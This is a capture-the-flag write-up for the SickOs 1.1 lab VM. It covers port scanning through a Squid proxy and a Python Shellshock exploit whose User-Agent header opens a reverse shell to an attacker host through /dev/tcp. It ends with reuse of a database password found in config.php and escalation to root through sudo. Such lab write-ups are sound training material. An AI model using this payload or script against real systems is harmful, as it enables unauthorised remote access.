NOTES ABOUT SickOs 1.1
[ 2016-01-24 ] [ VulnHub / SickOs 1.1 ]Status: Rooted
Skills: Port Scanning, Proxy Scanning, ShellShock, Reverse Shell, Sudo
Tools: nmap, squidscan, linuxprivchecker.py
PORT SCANNING
root@kali:~# nmap -v -sS -A -p- 10.17.0.103 Starting Nmap 7.00 ( https://nmap.org ) at 2016-01-24 01:57 ART [...] PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA) | 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA) |_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA) 3128/tcp open http-proxy Squid http proxy 3.1.19 | http-open-proxy: Potentially OPEN proxy. |_Methods supported:GET |_http-server-header: squid/3.1.19 |_http-title: ERROR: The requested URL could not be retrieved [...]PORT SCANNING THROUGHT PROXY SCRIPT:
#!/usr/bin/python import requests proxy = { "http": "http://10.17.0.103:3128" } f = open("puertos", 'r') for n in f: try: r = requests.get("http://127.0.0.1:" + n.strip(), proxies=proxy, timeout=0.1) if r.status_code == 200: print "Puerto " + n.strip() + " abierto." except requests.exceptions.Timeout: passRESULT:
root@kali:~/CTF/sickos# python squidscan Puerto 22 abierto. Puerto 80 abierto. Puerto 3306 abierto.
root@kali:~# nikto --host http://127.0.0.1 -useproxy http://10.17.0.103:3128 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 127.0.0.1 + Target Hostname: 127.0.0.1 + Target Port: 80 + Proxy: 10.17.0.103:3128 + Start Time: 2016-01-24 02:37:04 (GMT-3) --------------------------------------------------------------------------- + Server: Apache/2.2.22 (Ubuntu) + Retrieved via header: 1.0 localhost (squid/3.1.19) + Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21 [...] + OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271). + OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). [...] + End Time: 2016-01-24 02:37:34 (GMT-3) (30 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
GETTING IN
#!/usr/bin/python import requests target = "http://127.0.0.1/cgi-bin/status" proxy = { "http": "http://10.17.0.103:3128" } payload = { "user-agent" : "() { :; };/bin/bash -i >& /dev/tcp/10.17.0.30/1234 0>&1" } requests.get(target,headers=payload,proxies=proxy) root@kali:~# nc -lvp 1234 root@kali:~# python shellshock.py
ELEVATING PRIVILEGES
================================================================================================= LINUX PRIVILEGE ESCALATION CHECKER ================================================================================================= [*] GETTING BASIC SYSTEM INFO... [+] Kernel Linux version 3.11.0-15-generic (buildd@akateko) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 [+] Hostname SickOs [+] Operating System Ubuntu 12.04.4 LTS \n \l [*] GETTING NETWORKING INFO... [*] GETTING FILESYSTEM INFO... [*] ENUMERATING USER AND ENVIRONMENTAL INFO... [...] [+] All users [...] sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash [...] [+] Current User www-data [+] Current User ID uid=33(www-data) gid=33(www-data) groups=33(www-data) [*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS... [+] World Writeable Directories for User/Group 'Root' [...] drwxrwxrwx 7 root root 4096 Dec 5 06:25 /var/www/wolfcms/wolf [...] [+] World Writable Files [...] -rwxrwxrwx 1 root root 6815 Dec 5 06:32 /var/www/wolfcms/index.php -rwxrwxrwx 1 root root 3058 Dec 5 07:26 /var/www/wolfcms/config.php -rwxrwxrwx 1 root root 894 Dec 5 06:15 /var/www/wolfcms/favicon.ico -rwxrwxrwx 1 root root 4084 Dec 5 06:15 /var/www/wolfcms/CONTRIBUTING.md [...] [*] ENUMERATING PROCESSES AND APPLICATIONS... [*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER... [*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING... Finished =================================================================================================
www-data@SickOs:/var/www/wolfcms$ cat config.php <?php [...] // Database settings: define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306'); define('DB_USER', 'root'); define('DB_PASS', 'john@123'); define('TABLE_PREFIX', ''); [...] ?>
www-data@SickOs:/$ su sickos Password: john@123 sickos@SickOs:/$ sickos@SickOs:~$ cat .bash_history sudo su exit
FLAG:
root@SickOs:~# cat a0216ea4d51874464078c618298b1367.txt If you are viewing this!! ROOT! You have Succesfully completed SickOS1.1. Thanks for Trying